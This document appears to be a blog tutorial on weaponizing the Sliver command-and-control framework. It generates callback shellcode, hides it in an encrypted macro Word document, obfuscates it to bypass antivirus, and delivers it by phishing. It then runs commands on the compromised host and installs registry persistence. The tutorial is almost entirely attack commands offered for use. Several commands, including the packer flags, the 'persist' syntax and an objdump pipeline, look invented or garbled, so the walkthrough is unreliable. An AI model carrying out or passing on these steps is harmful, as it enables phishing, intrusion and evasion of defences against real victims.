Tutorial: Sliver C2 with BallisKit MacroPack and ShellcodePack

By /

Featured Image
Sliver is a powerful open-source Command and Control (C2) framework developed by BishopFox. This tutorial explains how to weaponize Sliver C2 using BallisKit MacroPack Pro and ShellcodePack to drop implants while evading security solutions.

You Should Know:

1. Setting Up Sliver C2

First, install Sliver on your Linux system:

curl https://sliver.sh/install | sudo bash

Start the Sliver server:

sliver-server

2. Generating a Sliver Payload

Generate a shellcode payload for Windows:

generate --mtls your-server-ip --os windows --arch amd64 --format shellcode --save payload.bin

3. Using BallisKit MacroPack Pro

BallisKit MacroPack Pro helps evade detection by obfuscating macros. Load the shellcode into a Word document:

python3 macro_pack.py -f payload.bin -o malicious_doc.docm --encrypt

4. ShellcodePack Integration

ShellcodePack further obfuscates the payload to bypass AV:

python3 shellcode_pack.py -i payload.bin -o final_payload.bin --xor --compress

5. Delivering the Payload

Use a phishing email or web server to deliver the weaponized document:

python3 -m http.server 8080

6. Establishing C2 Connection

Once executed, the Sliver implant connects back:

sessions -i

7. Post-Exploitation

Execute commands on the compromised host:

execute -c "whoami"

8. Persistence

Install a persistent backdoor:

persist -t registry -n "UpdateService" -v "C:\malware.exe"

What Undercode Say

Sliver C2 combined with BallisKit tools provides a robust method for red team operations. The use of shellcode obfuscation and macro evasion techniques enhances stealth. Below are additional useful commands for cybersecurity professionals:

Linux Commands for C2 Operations

  • Check network connections:
    netstat -tulnp
  • Monitor processes:
    ps aux | grep sliver
  • Extract shellcode from binary:
    objdump -d payload.bin | grep -i "[0-9a-f]:" | cut -f2

Windows Commands for Defense

  • Detect suspicious processes:
    tasklist /v | findstr "sliver"
  • Check registry persistence:
    reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Expected Output:

A successful Sliver implant execution should return an active session, allowing full control over the target system while maintaining evasion.

Prediction

As EDR solutions improve, red teams will increasingly rely on advanced obfuscation techniques like BallisKit’s tools to bypass defenses. Future C2 frameworks may integrate AI-driven evasion methods.

Relevant URL: Tutorial: Sliver C2 with BallisKit MacroPack and ShellcodePack

References:

Reported By: Emeric Nasi – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: